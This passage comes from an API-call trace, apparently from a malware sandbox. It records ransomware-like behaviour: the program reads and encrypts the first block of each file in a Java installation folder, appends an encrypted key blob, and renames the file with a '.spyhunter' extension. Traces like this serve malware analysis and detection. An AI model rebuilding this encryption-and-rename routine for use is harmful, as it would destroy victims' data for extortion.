lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce3b4*=0x2800, lpOverlapped=0x0) returned 1 [0174.631] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.631] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3b4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce3b4*=0x2800, lpOverlapped=0x0) returned 1 [0174.631] GetProcessHeap () returned 0x2c0000 [0174.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.631] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.631] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3b4, lpOverlapped=0x0 | out: lpBuffer=0x25ce3f4*, lpNumberOfBytesWritten=0x25ce3b4*=0x4, lpOverlapped=0x0) returned 1 [0174.718] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3b4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3b4*=0x30, lpOverlapped=0x0) returned 1 [0174.718] CloseHandle (hObject=0xb0) returned 1 [0174.718] GetProcessHeap () returned 0x2c0000 [0174.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.718] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2ssv.dll.spyhunter") returned 61 [0174.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2ssv.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2ssv.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jp2ssv.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jp2ssv.dll.spyhunter")) returned 1 [0174.719] GetProcessHeap () returned 0x2c0000 [0174.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.720] GetProcessHeap () returned 0x2c0000 [0174.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0174.720] GetProcessHeap () returned 0x2c0000 [0174.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20f40 | out: hHeap=0x2c0000) returned 1 [0174.720] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3f0 | out: pbBuffer=0x25ce3f0) returned 1 [0174.720] GetProcessHeap () returned 0x2c0000 [0174.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0174.720] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3e8*=0x30) returned 1 [0174.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxwebkit.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfxwebkit.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0174.721] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxwebkit.dll") returned 54 [0174.721] StrStrW (lpFirst="jfxwebkit.dll", lpSrch=".txt") returned 0x0 [0174.721] GetProcessHeap () returned 0x2c0000 [0174.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0174.721] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce3ac*=0x2800, lpOverlapped=0x0) returned 1 [0174.836] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.836] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce3ac*=0x2800, lpOverlapped=0x0) returned 1 [0174.836] GetProcessHeap () returned 0x2c0000 [0174.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0174.837] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.837] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3ac, lpOverlapped=0x0 | out: lpBuffer=0x25ce3ec*, lpNumberOfBytesWritten=0x25ce3ac*=0x4, lpOverlapped=0x0) returned 1 [0174.931] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3ac*=0x30, lpOverlapped=0x0) returned 1 [0174.931] CloseHandle (hObject=0xb0) returned 1 [0174.931] GetProcessHeap () returned 0x2c0000 [0174.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.931] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxwebkit.dll.spyhunter") returned 64 [0174.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxwebkit.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfxwebkit.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jfxwebkit.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jfxwebkit.dll.spyhunter")) returned 1 [0174.934] GetProcessHeap () returned 0x2c0000 [0174.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.934] GetProcessHeap () returned 0x2c0000 [0174.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0174.934] GetProcessHeap () returned 0x2c0000 [0174.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed27f0 | out: hHeap=0x2c0000) returned 1 [0174.935] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3f0 | out: pbBuffer=0x25ce3f0) returned 1 [0174.935] GetProcessHeap () returned 0x2c0000 [0174.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0174.935] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3e8*=0x30) returned 1 [0174.935] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-font.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javafx-font.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0174.936] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-font.dll") returned 56 [0174.936] StrStrW (lpFirst="javafx-font.dll", lpSrch=".txt") returned 0x0 [0174.936] GetProcessHeap () returned 0x2c0000 [0174.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.936] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce3ac*=0x2800, lpOverlapped=0x0) returned 1 [0174.938] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.938] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce3ac*=0x2800, lpOverlapped=0x0) returned 1 [0174.939] GetProcessHeap () returned 0x2c0000 [0174.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.939] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.939] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3ac, lpOverlapped=0x0 | out: lpBuffer=0x25ce3ec*, lpNumberOfBytesWritten=0x25ce3ac*=0x4, lpOverlapped=0x0) returned 1 [0175.026] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3ac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3ac*=0x30, lpOverlapped=0x0) returned 1 [0175.027] CloseHandle (hObject=0xb0) returned 1 [0175.027] GetProcessHeap () returned 0x2c0000 [0175.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.027] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-font.dll.spyhunter") returned 66 [0175.027] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-font.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javafx-font.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-font.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javafx-font.dll.spyhunter")) returned 1 [0175.028] GetProcessHeap () returned 0x2c0000 [0175.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.028] GetProcessHeap () returned 0x2c0000 [0175.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.028] GetProcessHeap () returned 0x2c0000 [0175.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5eec0 | out: hHeap=0x2c0000) returned 1 [0175.028] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3e8 | out: pbBuffer=0x25ce3e8) returned 1 [0175.028] GetProcessHeap () returned 0x2c0000 [0175.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.028] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3e0*=0x30) returned 1 [0175.028] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.030] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java.dll") returned 49 [0175.030] StrStrW (lpFirst="java.dll", lpSrch=".txt") returned 0x0 [0175.030] GetProcessHeap () returned 0x2c0000 [0175.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0175.030] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3a4*=0x2800, lpOverlapped=0x0) returned 1 [0175.032] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.032] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3a4*=0x2800, lpOverlapped=0x0) returned 1 [0175.032] GetProcessHeap () returned 0x2c0000 [0175.032] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0175.032] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.032] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3a4, lpOverlapped=0x0 | out: lpBuffer=0x25ce3e4*, lpNumberOfBytesWritten=0x25ce3a4*=0x4, lpOverlapped=0x0) returned 1 [0175.046] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3a4*=0x30, lpOverlapped=0x0) returned 1 [0175.046] CloseHandle (hObject=0xb0) returned 1 [0175.046] GetProcessHeap () returned 0x2c0000 [0175.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.046] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java.dll.spyhunter") returned 59 [0175.046] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java.dll.spyhunter")) returned 1 [0175.047] GetProcessHeap () returned 0x2c0000 [0175.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.048] GetProcessHeap () returned 0x2c0000 [0175.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.048] GetProcessHeap () returned 0x2c0000 [0175.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c209c0 | out: hHeap=0x2c0000) returned 1 [0175.048] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3e8 | out: pbBuffer=0x25ce3e8) returned 1 [0175.048] GetProcessHeap () returned 0x2c0000 [0175.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.048] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3e0*=0x30) returned 1 [0175.048] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jabswitch.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jabswitch.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.059] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jabswitch.exe") returned 54 [0175.059] StrStrW (lpFirst="jabswitch.exe", lpSrch=".txt") returned 0x0 [0175.059] GetProcessHeap () returned 0x2c0000 [0175.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0175.059] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce3a4*=0x2800, lpOverlapped=0x0) returned 1 [0175.145] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.145] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce3a4*=0x2800, lpOverlapped=0x0) returned 1 [0175.145] GetProcessHeap () returned 0x2c0000 [0175.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0175.145] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.145] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce3a4, lpOverlapped=0x0 | out: lpBuffer=0x25ce3e4*, lpNumberOfBytesWritten=0x25ce3a4*=0x4, lpOverlapped=0x0) returned 1 [0175.204] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce3a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce3a4*=0x30, lpOverlapped=0x0) returned 1 [0175.204] CloseHandle (hObject=0xb0) returned 1 [0175.204] GetProcessHeap () returned 0x2c0000 [0175.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.204] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jabswitch.exe.spyhunter") returned 64 [0175.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jabswitch.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jabswitch.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jabswitch.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jabswitch.exe.spyhunter")) returned 1 [0175.211] GetProcessHeap () returned 0x2c0000 [0175.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.211] GetProcessHeap () returned 0x2c0000 [0175.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.211] GetProcessHeap () returned 0x2c0000 [0175.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed23a0 | out: hHeap=0x2c0000) returned 1 [0175.211] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3e0 | out: pbBuffer=0x25ce3e0) returned 1 [0175.212] GetProcessHeap () returned 0x2c0000 [0175.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.212] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3d8*=0x30) returned 1 [0175.212] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pcsc.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\j2pcsc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.212] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pcsc.dll") returned 51 [0175.212] StrStrW (lpFirst="j2pcsc.dll", lpSrch=".txt") returned 0x0 [0175.212] GetProcessHeap () returned 0x2c0000 [0175.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0175.213] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce39c*=0x2800, lpOverlapped=0x0) returned 1 [0175.270] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.270] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce39c*=0x2800, lpOverlapped=0x0) returned 1 [0175.270] GetProcessHeap () returned 0x2c0000 [0175.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0175.270] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.271] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce39c, lpOverlapped=0x0 | out: lpBuffer=0x25ce3dc*, lpNumberOfBytesWritten=0x25ce39c*=0x4, lpOverlapped=0x0) returned 1 [0175.271] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce39c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce39c*=0x30, lpOverlapped=0x0) returned 1 [0175.271] CloseHandle (hObject=0xb0) returned 1 [0175.271] GetProcessHeap () returned 0x2c0000 [0175.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.271] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pcsc.dll.spyhunter") returned 61 [0175.271] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pcsc.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\j2pcsc.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pcsc.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\j2pcsc.dll.spyhunter")) returned 1 [0175.272] GetProcessHeap () returned 0x2c0000 [0175.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.272] GetProcessHeap () returned 0x2c0000 [0175.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0175.272] GetProcessHeap () returned 0x2c0000 [0175.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20910 | out: hHeap=0x2c0000) returned 1 [0175.272] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce3e0 | out: pbBuffer=0x25ce3e0) returned 1 [0175.272] GetProcessHeap () returned 0x2c0000 [0175.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0175.272] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce3d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce3d8*=0x30) returned 1 [0175.273] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\gstreamer-lite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0175.273] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\gstreamer-lite.dll") returned 59 [0175.273] StrStrW (lpFirst="gstreamer-lite.dll", lpSrch=".txt") returned 0x0 [0175.273] GetProcessHeap () returned 0x2c0000 [0175.273] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0175.273] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25ce39c*=0x2800, lpOverlapped=0x0) returned 1 [0175.376] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.376] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce39c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25ce39c*=0x2800, lpOverlapped=0x0) returned 1 [0175.376] GetProcessHeap () returned 0x2c0000 [0175.377] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0175.377] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.377] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce3dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce39c, lpOverlapped=0x0 | out: lpBuffer=0x25ce3dc*, lpNumberOfBytesWritten=0x25ce39c*=0x4, lpOverlapped=0x0) returned 1 [0175.395] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce39c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce39c*=0x30, lpOverlapped=0x0) returned 1 [0175.395] CloseHandle (hObject=0xb0) returned 1 [0175.395] GetProcessHeap () returned 0x2c0000 [0175.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.395] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\gstreamer-lite.dll.spyhunter") returned 69 [0175.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\gstreamer-lite.dll"), 